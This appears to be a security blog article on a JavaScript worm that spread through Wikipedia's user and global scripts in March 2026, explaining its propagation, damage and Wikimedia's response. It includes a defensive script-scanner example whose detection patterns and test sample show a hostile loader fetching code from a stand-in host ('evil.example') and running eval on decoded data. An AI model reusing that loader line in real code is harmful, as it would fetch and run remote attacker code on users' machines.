
Mar 08, 2026 · 5 min read

A Malicious Script Sat in Wikipedia for Two Years—Then a Security Engineer Accidentally Triggered It

A self-propagating JavaScript worm vandalized nearly 4,000 Wikipedia pages, compromised 85 user accounts, and forced the world’s largest encyclopedia into read-only mode.


The 23-Minute Takeover

On March 5, 2026, Wikimedia Foundation staff were running a routine security review of user-authored code across Wikimedia projects. During the review, a security engineer inadvertently executed a dormant malicious script that had been uploaded to Russian Wikipedia in March 2024. The code had sat undetected for approximately two years.

Once activated, the worm took just 23 minutes to vandalize 3,996 pages, replace the personal JavaScript files of 85 users, and force the Wikimedia Foundation to put all projects into read-only mode.

The malicious script was stored at User:Ololoshka562/test.js and had been associated with scripts used in previous attacks on wiki projects. Its two-year dormancy period highlights a fundamental challenge in open platforms: code that looks harmless today can become a weapon the moment the right conditions align.

How the Worm Spread

The worm exploited Wikipedia's user script system with a dual-layer propagation strategy. When the compromised staff account, which had elevated permissions to edit global JavaScript, triggered the code, the worm injected itself into MediaWiki:Common.js, a global script that runs on every page across all Wikimedia wikis.

As a fallback mechanism, the worm simultaneously injected itself into individual users' personal common.js pages. This meant that even if the global script was cleaned up, any user who loaded an infected personal script would restart the propagation cycle.
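This reinfection loop can be sketched abstractly. The simulation below is not the worm's code: it is a minimal set-based model (the `simulate` function and the user names are invented for illustration) of why reverting only the global script does not end the outbreak:

```javascript
// Abstract model of the dual-layer reinfection cycle described above.
// "globalInfected" stands in for MediaWiki:Common.js; "infectedUsers"
// for per-user personal common.js pages. No MediaWiki code is involved.
function simulate({ infectedUsers, globalInfected }, pageLoadsByUser) {
  const state = { infectedUsers: new Set(infectedUsers), globalInfected };
  for (const user of pageLoadsByUser) {
    // An infected personal script re-injects the global script on load...
    if (state.infectedUsers.has(user)) state.globalInfected = true;
    // ...and an infected global script infects every user who loads a page.
    if (state.globalInfected) state.infectedUsers.add(user);
  }
  return state;
}

// Cleanup that reverted only the global script, leaving one user infected:
const afterPartialCleanup = { infectedUsers: ["alice"], globalInfected: false };
// A single page load by the still-infected user restarts the whole cycle.
const result = simulate(afterPartialCleanup, ["alice", "bob"]);
console.log(result.globalInfected);           // true: global script reinfected
console.log(result.infectedUsers.has("bob")); // true: spread resumed
```

Both layers have to be cleaned in the same window, which is why taking the wikis read-only first was the right call.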

The worm also used the Special:Random page to select targets at random, inserting oversized images and hidden JavaScript loaders into each one. If the infected user had administrative privileges, the script escalated further, deleting pages via Special:Nuke and the action=delete API.

The Damage

In under half an hour, the worm accomplished the following:

  • Vandalized 3,996 pages with oversized images and injected scripts
  • Replaced 85 users' personal common.js files with the malicious loader
  • Deleted multiple articles using administrative privileges
  • Injected cross-site scripting payloads referencing an external domain

Editors first reported the incident on Wikipedia's Village Pump technical forum, where users noticed a flood of automated edits adding hidden scripts and vandalism to random pages.

Wikimedia's Response

The Wikimedia Foundation moved quickly once the incident was identified. All projects were placed in read-only mode for approximately two hours to stop the worm from spreading further. User JavaScript was temporarily disabled across all wikis for most of the day.

Engineers reverted the global Common.js file, manually rolled back the 85 compromised user scripts, and restored all deleted and vandalized pages from backups. The modified pages were then "suppressed," removing them from public change histories to prevent the malicious code from being copied.

The Foundation confirmed that no personal information was breached and no permanent damage occurred. But the incident exposed a structural vulnerability that had existed for years.

The Larger Problem: Open Platforms and Trusted Code

Wikipedia allows users to write custom JavaScript that runs in their own browser sessions. Power users and administrators rely on these scripts for moderation, editing tools, and workflow automation. The system is built on trust: anyone can upload a script, and anyone with the right permissions can execute one.
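Under the hood, a user script page becomes executable because MediaWiki can serve any wiki page verbatim via `action=raw` with a JavaScript content type. The helper below is purely illustrative (the `rawScriptUrl` name and the example wiki and title are assumptions, not Wikimedia code) and shows the shape of such a load URL:

```javascript
// Illustrative only: builds the kind of URL through which a wiki page
// (here a user's personal script) is fetched and executed as JavaScript.
function rawScriptUrl(wiki, title) {
  const params = new URLSearchParams({
    title,                    // e.g. "User:Example/common.js"
    action: "raw",            // serve the page content verbatim
    ctype: "text/javascript", // ask for a JavaScript content type
  });
  return `https://${wiki}/w/index.php?${params}`;
}

console.log(rawScriptUrl("ru.wikipedia.org", "User:Example/common.js"));
```

Whoever can edit such a page controls code that runs in the browser of everyone who loads it, and that is exactly the trust boundary the worm crossed.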

This architecture mirrors the trust models used by browser extension marketplaces, package managers like npm, and plugin ecosystems across the software industry. In each case, a single piece of malicious code, once trusted, can propagate through the entire system.

The Wikipedia worm did not exploit a zero-day vulnerability or bypass any authentication system. It simply waited until someone with elevated privileges ran it. That is the same attack pattern behind trojanized MCP servers, malicious VS Code extensions, and compromised browser extension updates. The code was there. It just needed the right moment.

What This Means for Security

The Wikipedia incident is a textbook example of a supply-chain-style attack on a platform that allows user-contributed code. The key takeaways are straightforward:

  • Dormant malicious code can survive for years before being triggered
  • Elevated privileges amplify the damage of any compromised script
  • Platforms that allow user-authored code need automated scanning, not just manual review
  • Self-propagating code can spread faster than human response times
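On the automated-scanning point, even crude static heuristics would have surfaced a script with this worm's traits. The sketch below is not Wikimedia's actual tooling; the rule set, names, and sample snippets are illustrative assumptions:

```javascript
// A minimal static-scanning sketch: flag user scripts that reference
// external hosts, use dynamic code execution, or hide injected elements.
const SUSPICIOUS = [
  // URLs whose host is not a wikimedia.org / wikipedia.org subdomain
  { name: "external-script-load",
    re: /https?:\/\/(?!(\w+\.)*wikimedia\.org|(\w+\.)*wikipedia\.org)[^\s"']+/i },
  { name: "dynamic-eval", re: /\beval\s*\(|new\s+Function\s*\(/ },
  { name: "hidden-element", re: /display\s*:\s*none/i },
];

function scanScript(source) {
  return SUSPICIOUS.filter(({ re }) => re.test(source)).map(({ name }) => name);
}

// A typical legitimate gadget load vs. a loader with worm-like traits:
const benign = `mw.loader.load("https://en.wikipedia.org/w/index.php?title=User:X/tool.js&action=raw&ctype=text/javascript");`;
const shady = `var s = document.createElement("script"); s.src = "https://evil.example/payload.js"; eval(atob(data));`;

console.log(scanScript(benign)); // []
console.log(scanScript(shady));  // ["external-script-load", "dynamic-eval"]
```

Pattern matching like this is trivially evadable, but as a first-pass filter over thousands of user script pages it turns a two-year blind spot into a review queue.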

Wikipedia was lucky. The worm's payload was destructive but not catastrophic. It vandalized pages and deleted content, but it did not exfiltrate user data or plant persistent backdoors in the platform's infrastructure. A more sophisticated attacker, one willing to wait two years for the right trigger, could have done far worse.

The incident is a reminder that the most dangerous code is not always the newest. Sometimes it is the script that has been sitting quietly in a user directory since 2024, waiting for someone to run it.